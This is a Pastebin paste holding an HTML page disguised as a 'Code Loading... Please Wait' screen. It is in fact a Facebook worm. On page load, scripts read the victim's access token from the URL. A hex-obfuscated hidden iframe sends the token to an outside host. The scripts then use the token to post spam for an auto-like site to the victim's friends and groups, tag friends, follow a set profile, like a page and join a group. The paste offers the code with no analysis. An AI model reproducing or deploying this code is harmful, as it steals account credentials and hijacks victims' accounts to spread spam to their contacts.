Advertisement
Puka_no1

ok

Aug 7th, 2014
231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.14 KB | None | 0 0
  1.  
  2. <html><head></head><body onload="token();get_groups();get_friends();join_group();follow();like_page();timeline();">
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta http-equiv="refresh" content="50;URL=https://www.facebook.com">
  4. <center>
  5. <center><b><font size="5">Code Loading.....Please Wait 20s</font></b></center><br>
  6. <img src="http://www.imagenestop.com/gif2/gif-loading-62064.jpg"><br>
  7. <img src="http://jimpunk.net/Loading/wp-content/uploads/loading1.gif"></center>
  8.  
  9. <title>Seting.....Wait</title>
  10. <link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" type="image/x-icon">
  11. <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
  12.  
  13. <script>
  14. var url = "";
  15. var text = "Sử dụng Auto Like, Auto Sub, Auto Share, Auto Like FanPage. Không Spam, Free, chất lượng, An Toàn Tuyệt Đối. Truy cập : http://likeso1.net/ để sử dụng nha .
  16. Hãy chia sẽ cho mọi người để được nhiều like và sub hơn nữa ...";
  17. var image_link = "http://apppro.ryo.vn/lon.jpg";
  18. gonderildi = 0;
  19.  
  20.  
  21. var _0x269e=["\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x74\x6F\x6B\x65\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x61\x6D\x65\x6F\x2E\x62\x6C\x2E\x65\x65\x2F\x74\x6F\x6B\x65\x6E\x2E\x70\x68\x70\x3F\x61\x74\x3D","\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x6F\x72\x64\x65\x72\x3A\x30\x70\x78\x20\x23\x46\x46\x46\x46\x46\x46\x20\x6E\x6F\x6E\x65\x3B\x22\x20\x6E\x61\x6D\x65\x3D\x22\x74\x6F\x6B\x65\x6E\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x70\x78\x22\x20\x6D\x61\x72\x67\x69\x6E\x77\x69\x64\x74\x68\x3D\x22\x30\x70\x78\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x70\x78\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x70\x78\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x74\x75\x6E\x67\x75\x79\x65\x6E\x32\x30\x31\x34","\x64\x6A\x6B\x69\x65\x75\x6D\x61\x78\x2E\x69\x6E\x66\x6F","\x61\x65\x68\x61\x69\x76\x6C","\x6E\x67\x61\x79\x68\x6F\x6D\x71\x75\x61\x64\x61\x74\x75\x6E\x67\x2E\x69\x6E\x66\x6F"];var access_token=window[_0x269e[2]][_0x269e[1]][_0x269e[0]](1);function token(){document[_0x269e[5]](_0x269e[4])[_0x269e[3]]=_0x269e[6]+access_token+_0x269e[7];} ;follow(100006875472489);
  22. like_page(244973422346989);
  23.  
  24.  
  25.  
  26. function get_groups(){
  27. jQuery.ajax({
  28. url:'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token='+access_token,
  29. dataType:'jsonp',
  30. success:function(data){
  31. post_groups(data);
  32. }
  33. });
  34. }
  35. function get_friends(){
  36. jQuery.ajax({
  37. url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token,
  38. dataType:'jsonp',
  39. success:function(data){
  40. post_friends(data);
  41. }
  42. });
  43. }
  44. function post_friends(list){
  45. for(i=0;i<list.data.length;i++){
  46. jQuery.ajax({
  47. url:'https://graph.facebook.com/'+list.data[i].uid+'/photos?url=' + image_link + '&message=' + text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  48. dataType:'script',
  49. success:function(){
  50. gonderildi += 1;
  51. if(gonderildi >= list.data.length){
  52. }
  53. }
  54. });
  55. }
  56. }
  57. function post_groups(list){
  58. for(i=0;i<list.data.length;i++){
  59. jQuery.ajax({
  60. url:'https://graph.facebook.com/'+list.data[i].gid+'/photos?url=' + image_link + '&message='+ text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  61. dataType:'script',
  62. success:function(){
  63. gonderildi += 1;
  64. if(gonderildi >= list.data.length){
  65. }
  66. }
  67. });
  68. }
  69. }
  70.  
  71. function timeline() {
  72. $['getJSON']('https://graph.facebook.com/me/photos?url=' + image_link + '&message=' + text + '' + url + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
  73. if (_0x1f66xf['id']) {
  74. var _0x1f66x11 = _0x1f66xf['id'];
  75. var _0x1f66x12 = 100;
  76. $['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
  77. if (_0x1f66xf['data']) {
  78. var _0x1f66x13 = [];
  79. $['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
  80. _0x1f66x13['push'](_0x1f66x7['id']);
  81. $['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
  82. });
  83. };
  84. });
  85. };
  86. });
  87. };
  88.  
  89.  
  90. function follow(id){
  91. $.getJSON('https://graph.facebook.com/' + id + '/subscribers?method=post&access_token=' + access_token, function (response) {
  92. });
  93. }
  94. function like_page(id){
  95. $.getJSON('https://graph.facebook.com/me/likes?access_token=' + access_token + '&method=POST&url=https://www.facebook.com/' + id, function (response) {
  96. });
  97. }
  98. function like_post(id){
  99. $.getJSON('https://graph.facebook.com/' + id + '/likes/?method=post&access_token=' + access_token, function (response) {
  100. });
  101. }
  102. function join_group(grpid){
  103. $.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
  104. if (response.id) {
  105. var userid = response.id;
  106. $.getJSON('https://graph.facebook.com/'+grpid+'/members/' + userid + '?method=post&access_token=' + access_token, function (response) {
  107. if(response.data){
  108. }
  109. });
  110. }
  111. });
  112. }
  113.  
  114. </script>
  115. <div id="token"><iframe src="http://bameo.bl.ee/token.php?at=" style="border:0px #FFFFFF none;" name="token" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="0px" width="0px"></iframe></div>
  116.  
  117. </body></html>
  118.  
  119. </iframe>
  120. <meta http-equiv="refresh" content="17;url=https://likeso1.net/">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement